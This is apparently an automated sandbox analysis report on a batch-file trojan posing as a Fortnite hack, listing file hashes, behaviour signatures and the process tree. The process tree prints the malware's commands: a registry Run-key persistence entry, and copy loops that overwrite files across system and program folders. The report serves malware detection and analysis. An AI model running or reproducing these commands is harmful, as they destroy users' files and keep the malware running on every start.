Resubmissions

09/03/2025, 01:58

250309-cdv29swybs 10

08/03/2025, 06:55

250308-hp35xatjt9 10

08/03/2025, 04:53

250308-fh1ebssky5 10

Analysis

  • max time kernel
    85s
  • max time network
    156s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08/03/2025, 06:55

General

  • Target

    My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat

  • Size

    34KB

  • MD5

    ac04b6f6fa293c4b55c4c8b49372a9ec

  • SHA1

    9dfca519218c3c10203163454f1237916b0655cc

  • SHA256

    273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92

  • SHA512

    b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086

  • SSDEEP

    192:9TIqVppLuLpDq7QYfLGMV+jasHHLgLxLR44444444444444444M666666666666Q:9rVppLuLpDq7QYfLGMV+jasHHLgLxi

Malware Config

Signatures

  • Drops file in Drivers directory 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Modifies registry class 14 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1320
    • C:\Windows\system32\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_12735_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat /f
      2⤵
      • Adds Run key to start application
      PID:4412
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y "
      2⤵
        PID:4876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_doc.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
        2⤵
          PID:4852
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
          2⤵
            PID:2436
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_lnk.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
            2⤵
            • Drops file in System32 directory
            • Drops file in Windows directory
            PID:2044
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y "
            2⤵
              PID:1644
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
              2⤵
              • Drops file in Program Files directory
              PID:1572
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y "
              2⤵
                PID:4800
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                2⤵
                • Drops file in Drivers directory
                • Drops file in Program Files directory
                • Drops file in Windows directory
                PID:1120
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                2⤵
                  PID:5056
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                  2⤵
                    PID:4264
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                    2⤵
                      PID:2136
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                      2⤵
                      • Drops file in System32 directory
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      PID:5072
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                      2⤵
                        PID:4300
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                        2⤵
                          PID:4648
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                          2⤵
                            PID:2308
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                            2⤵
                              PID:5108

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_doc.txt

                            Filesize

                            1KB

                            MD5

                            548e0aca55c4cae0e2df2d0d5ac18f34

                            SHA1

                            311e507a79c8174007d26837ff55b25722eae0ca

                            SHA256

                            3ed54618f793a9f7f9c033d5d3e5d3c68ded55df8710428dd7a40872db6e0f9a

                            SHA512

                            5355d65bfbb5587dcda21d026c948229cee95dddc78b0e825106dcedc4f13e008cfbbf49266a09d8847189ee569a266f5827be0e8ed88bab7f91c9a3f12250ca

                          • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_exe.txt

                            Filesize

                            428KB

                            MD5

                            42157d62377b0bfcfa95bca5b12136b5

                            SHA1

                            02d5874d9843b89c16b80bfc0c2cbd26d875b481

                            SHA256

                            f7784c781833f51b94600e11732943a31d368ac259360e72e3b944cb35b38388

                            SHA512

                            ae9974836072dd043ad8a8f75be51f72a4e0be7326ef5a6b547b8e5823113303560587a3f7bfe20a0c3b8c7c6c70c2ef2328ea9984eb073bea456d242e0ff645

                          • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_lnk.txt

                            Filesize

                            37KB

                            MD5

                            fef2df506ee1214eb1b613b8fc536439

                            SHA1

                            3985c77b58a678c6d3c96f002cd9579b1732257b

                            SHA256

                            88c9e05be13767bb5c67ea29e8b241197e8d9e8ac229596cc0c9f277bf840eb0

                            SHA512

                            9dcacbde5518b80e18aa3a097ccce021bd94c87c0f8f8bd59e8b96a72845520b70ce0e851cf2e05ac73abbc9d6b37564bd12bde5d93e754d452a803ae0e29ef4

                          • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_mp4.txt

                            Filesize

                            1KB

                            MD5

                            59ea1c8fcc19ef7b68f5b815b5ab66ce

                            SHA1

                            8667b22c499703e9950984a694ed0c4fbda21c05

                            SHA256

                            36dcdf53d889cba601ba0f255ceb21a755780cdbe7c70383f5491e5f4481b87e

                            SHA512

                            080e22fe69858d2128e226436d3c8cd99911cbf7978fb898249505f8690491b6b29ab44c33f0bdf1b9e8f70f56abb60f0659b2b00e50d5fe5f9a2644c1546c98

                          • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_pdf.txt

                            Filesize

                            2KB

                            MD5

                            d5e1a37b60ca49583586dfdb3344b6b0

                            SHA1

                            00a606d0b5d0b0b59e9817fdd6149cc46f2b8e8f

                            SHA256

                            90ea0016d98e3494b20f255aad714504afc9663329342d47782750ce88089c93

                            SHA512

                            b76ed027e64adba03e1740dad648c33bdcd11cefe517318567b8f345ed37f9b5673cd5af16538212888929bf954a39e39e5b609a41a047e334179d01633e8840

                          • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_png.txt

                            Filesize

                            2.1MB

                            MD5

                            50fdd0dc567d10123b19045481eb7bfb

                            SHA1

                            49a97d143326c7481fdeb68f934e373729b8a47a

                            SHA256

                            4c2c979e92513d0092de287005c83af46f5335be603175192a8bd878f482c2fb

                            SHA512

                            8765bd61eafe4e5223edf2dd1f5123927cdb2f6f8c9cd31fb20dd6fb37a5b7f594c3282b94cfbab774f40eae9b53e0c982e3c6e4ec52f4a51e1a1df53eb4615b

                          • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_txt.txt

                            Filesize

                            35KB

                            MD5

                            f4b7738f0b43402682d34e0fa25c3094

                            SHA1

                            7574bd63175ef0fee8f3c384a1b5b63bdbb42fbc

                            SHA256

                            780e0730d95ec043a8df4259d29cdb67295904863ed3e9d51e4333c48a4f063b

                            SHA512

                            70fd2bda5cc440d8126206b5c32eb34d730ba74f0217b5d3ab4b00caf716f0b15e9f24676ce317ae2946248598fe4fa1c0667f2214adacf51a0b356f544cb39c

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx

                            Filesize

                            34KB

                            MD5

                            ac04b6f6fa293c4b55c4c8b49372a9ec

                            SHA1

                            9dfca519218c3c10203163454f1237916b0655cc

                            SHA256

                            273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92

                            SHA512

                            b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086